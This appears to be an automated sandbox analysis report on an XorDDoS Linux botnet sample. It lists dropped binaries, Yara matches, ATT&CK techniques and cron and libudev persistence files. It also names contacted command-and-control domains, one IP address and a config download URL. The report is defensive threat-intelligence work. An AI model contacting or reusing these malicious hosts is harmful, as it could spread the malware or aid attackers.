Source: /usr/bin/exnwncfijy (PID: 5566)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5569)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5571)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5574)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5577)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5583)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5586)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5590)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5593)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5596)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5602)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5605)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5607)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5610)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5613)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5621)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5624)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5626)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5630)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5632)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5639)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5642)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5644)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5647)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5650)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5656)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5659)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5661)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5664)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5667)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5673)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5676)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5678)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5681)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5684)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5692)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5695)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5697)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5700)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5703)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5709)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5712)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5714)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5717)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5720)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5727)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5730)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5732)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5735)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5738)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5744)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5747)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5749)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5752)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5754)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5761)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5764)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5766)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5769)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5772)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5778)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5780)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5782)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5785)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5788)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5795)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5797)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5800)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5802)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5805)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5814)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5816)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5818)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5821)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5824)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/btbrmdkijd (PID: 5832)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/btbrmdkijd (PID: 5834)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/btbrmdkijd (PID: 5836)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/btbrmdkijd (PID: 5839)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/btbrmdkijd (PID: 5842)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvcnxeaxdt (PID: 5849)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvcnxeaxdt (PID: 5851)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvcnxeaxdt (PID: 5853)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvcnxeaxdt (PID: 5856)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hvcnxeaxdt (PID: 5858)	Queries kernel information via 'uname':	Jump to behavior

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: eTASxT3bjO.elf, type: SAMPLE
Source: Yara match	File source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5433, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5437, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5450, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5453, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5455, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5458, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5461, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5470, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5473, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5475, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5478, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5481, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5498, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5501, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5530, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5533, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5535, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5538, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5541, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5551, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5553, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5558, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5565, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5570, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5573, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5582, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5585, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5589, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5594, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5601, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5606, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5609, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5623, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5625, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5631, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5638, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5641, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5643, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5646, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5655, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5657, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5663, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5666, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5675, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5677, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5683, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5691, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5694, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5699, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5702, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ygqhgbaeei, type: DROPPED
Source: Yara match	File source: /usr/bin/kffnhivjdw, type: DROPPED
Source: Yara match	File source: /usr/bin/svkksitypo, type: DROPPED
Source: Yara match	File source: /usr/bin/eoogzzilvp, type: DROPPED
Source: Yara match	File source: /usr/bin/xjdcsmwtwe, type: DROPPED
Source: Yara match	File source: /usr/bin/evbjclrakz, type: DROPPED
Source: Yara match	File source: /usr/bin/wvicexcnqi, type: DROPPED
Source: Yara match	File source: /usr/bin/zqylkjndwx, type: DROPPED
Source: Yara match	File source: /usr/bin/mqnpjwpasf, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/yfaogzsdtv, type: DROPPED
Source: Yara match	File source: /usr/bin/xaxopmwzau, type: DROPPED
Source: Yara match	File source: /usr/bin/vijnytmbcx, type: DROPPED
Source: Yara match	File source: /usr/bin/uruvhkrplh, type: DROPPED
Source: Yara match	File source: /usr/bin/ghgagimgub, type: DROPPED
Source: Yara match	File source: /usr/bin/exnwncfijy, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	11 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	1 File Deletion	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

Threatname: XorDDoS

{"C2 list": []}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
eTASxT3bjO.elf	68%	ReversingLabs	Linux.Network.Xor
eTASxT3bjO.elf	100%	Avira	TR/ELF.DDoS.Xor.b
eTASxT3bjO.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/usr/bin/exnwncfijy	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/lib/libudev.so	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/ygqhgbaeei	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/svkksitypo	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/zqylkjndwx	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/uruvhkrplh	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/xaxopmwzau	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/ghgagimgub	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/eoogzzilvp	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/evbjclrakz	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/yfaogzsdtv	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/kffnhivjdw	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/xjdcsmwtwe	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/mqnpjwpasf	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/vijnytmbcx	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/exnwncfijy	100%	Joe Sandbox ML
/usr/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/ygqhgbaeei	100%	Joe Sandbox ML
/usr/bin/svkksitypo	100%	Joe Sandbox ML
/usr/bin/zqylkjndwx	100%	Joe Sandbox ML
/usr/bin/uruvhkrplh	100%	Joe Sandbox ML
/usr/bin/xaxopmwzau	100%	Joe Sandbox ML
/usr/bin/ghgagimgub	100%	Joe Sandbox ML
/usr/bin/wvicexcnqi	100%	Joe Sandbox ML
/usr/bin/eoogzzilvp	100%	Joe Sandbox ML
/usr/bin/evbjclrakz	100%	Joe Sandbox ML
/usr/bin/yfaogzsdtv	100%	Joe Sandbox ML
/usr/bin/kffnhivjdw	100%	Joe Sandbox ML
/usr/bin/xjdcsmwtwe	100%	Joe Sandbox ML
/usr/bin/mqnpjwpasf	100%	Joe Sandbox ML
/usr/bin/vijnytmbcx	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	42%	ReversingLabs	Linux.Network.Xor
/usr/lib/libudev.so	68%	ReversingLabs	Linux.Network.Xor

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://ww.aass654.com/config.rar	0%	Avira URL Cloud	safe
https://ww.aass654.com/config.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ee.xxcc789.com	137.175.88.241	true	true	unknown
ee.jjkk567.com	unknown	unknown	true	unknown
ee.vvbb321.com	unknown	unknown	true	unknown
ee.aass654.com	unknown	unknown	true	unknown
ee.nnmm234.com	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.gnu.org/software/libc/bugs.html	eTASxT3bjO.elf, exnwncfijy.13.dr, libudev.so.13.dr, ygqhgbaeei.13.dr, svkksitypo.13.dr, zqylkjndwx.13.dr, uruvhkrplh.13.dr, xaxopmwzau.13.dr, ghgagimgub.13.dr, eoogzzilvp.13.dr, evbjclrakz.13.dr, yfaogzsdtv.13.dr, kffnhivjdw.13.dr, xjdcsmwtwe.13.dr, mqnpjwpasf.13.dr, vijnytmbcx.13.dr	false		high
